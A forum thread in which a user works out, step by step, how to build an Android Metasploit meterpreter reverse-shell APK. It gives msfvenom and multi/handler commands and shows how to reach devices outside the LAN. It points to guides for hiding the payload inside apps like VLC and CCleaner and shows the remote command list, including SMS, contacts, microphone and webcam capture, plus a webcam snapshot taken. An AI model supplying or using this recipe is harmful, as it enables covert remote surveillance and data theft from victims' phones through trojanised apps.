Gentoo Forums
[SOLVED] android metasploit
niceflower
Tux's lil' helper
Joined: 31 Mar 2017
Posts: 76

Posted: Mon Jun 26, 2017 6:38 pm    Post subject: [SOLVED] android metasploit

Hello, I have a question about a piece of software crafted with the Metasploit framework.
It runs fine; the only downside is that when the Android phone goes into idle, the meterpreter seems to die, and the only way to restart it is by launching the payload icon on the Android phone again.
For a free payload it does include cool features; however, I can not seem to get the meterpreter consistent.
Any ideas?
msfconsole:
The payload is called with: msfvenom -p android/meterpreter/reverse_tcp LHOST= ip LPORT = 444 r > name.apk
payload is set with:
Code:
set PAYLOAD android/meterpreter/reverse_tcp

It would be nice to have a consistent connection to my phone so I can track it if it gets stolen, using Google Maps.
I know little about who made this payload for the Metasploit framework, or if anyone else knows something about it.

*edit* The only way I can seem to start the meterpreter is by pressing the icon on the phone :(
The solution would be to make the .apk auto run each time after idle, or even better make it auto run 24/7.

I just checked the same payload on my Galaxy Tab 3, and there the meterpreter stays consistent even when on idle,
so the problem is related to my Huawei P8 phone.


Last edited by niceflower on Tue Jun 27, 2017 12:29 am; edited 1 time in total
niceflower
Tux's lil' helper
Joined: 31 Mar 2017
Posts: 76

Posted: Tue Jun 27, 2017 12:11 am

OK, I found it: about the Huawei P8, instead of creating tcp:
Code:
msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=4444 -o name.apk

*To make the payload work outside the LAN network, for example with a 4G mobile network, just use LHOST=your external public IP, and then to start the meterpreter set LHOST=your internal boxen IP.
I used http:
Code:
msfvenom -p android/meterpreter/reverse_http LHOST=ip LPORT=4444 -o name.apk

Then to start msfconsole:
Code:
msfconsole
use multi/handler
set PAYLOAD android/meterpreter/reverse_http
set LHOST (put ip here)
set LPORT 4444
exploit
?


When closing down Metasploit and restarting, there is actually no interaction needed with the Android device to start a new meterpreter shell.
The only downside for now is that the reverse_http payload can not take webcam snap, stream, wlan_geolocate and some other features when the telephone is on idle;
however, this is not a real concern at this moment for me.

*last edit*
I just noticed a wakelock option, so everything is working on idle too now with the reverse_http payload on port 4444.

Sorry for being a bit Gentoo off-topic.
niceflower
Tux's lil' helper
Joined: 31 Mar 2017
Posts: 76

Posted: Wed Jun 28, 2017 6:13 pm

Hello!

I explored my Android Metasploit project, and noticed that it was possible to build the PAYLOAD into VLC.apk (VideoLAN) and ccleaner.apk (a tool to clean up a phone).

These websites can be very useful on how to embed the compromised .apk into any existing .apk:
https://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/
https://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-0166901/

I can say it works, and VLC is running on my Huawei P8 now. These are some commands from the meterpreter shell on my Kali Rolling Live:
The wakelock command is a bit bugged, and keeping the meterpreter consistent is an art.

I have tried to look into creating a service in the vlc.apk with Android Studio on Linux: I am stuck on how to create the service hook at this point, to let it run 24/7.
The problem still seems to be that the meterpreter shell dies over time :(

*edit*
This proves how important it is to have "do not allow apps from untrusted sources" turned on in Android, because any .apk from an untrusted source can be manipulated.
Code:
meterpreter > ?
Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Android Commands
================

    Command           Description
    -------           -----------
    activity_start    Start an Android activity from a Uri string
    check_root        Check if device is rooted
    dump_calllog      Get call log
    dump_contacts     Get contacts list
    dump_sms          Get sms messages
    geolocate         Get current lat-long using geolocation
    hide_app_icon     Hide the app icon from the launcher
    interval_collect  Manage interval collection capabilities
    send_sms          Sends SMS from target session
    set_audio_mode    Set Ringer Mode
    sqlite_query      Query a SQLite database from storage
    wakelock          Enable/Disable Wakelock
    wlan_geolocate    Get current lat-long using WLAN information

meterpreter > webcam_snap
[-] Error running command webcam_snap: Rex::TimeoutError Operation timed out.
meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/OuZRSbmh.jpeg
meterpreter >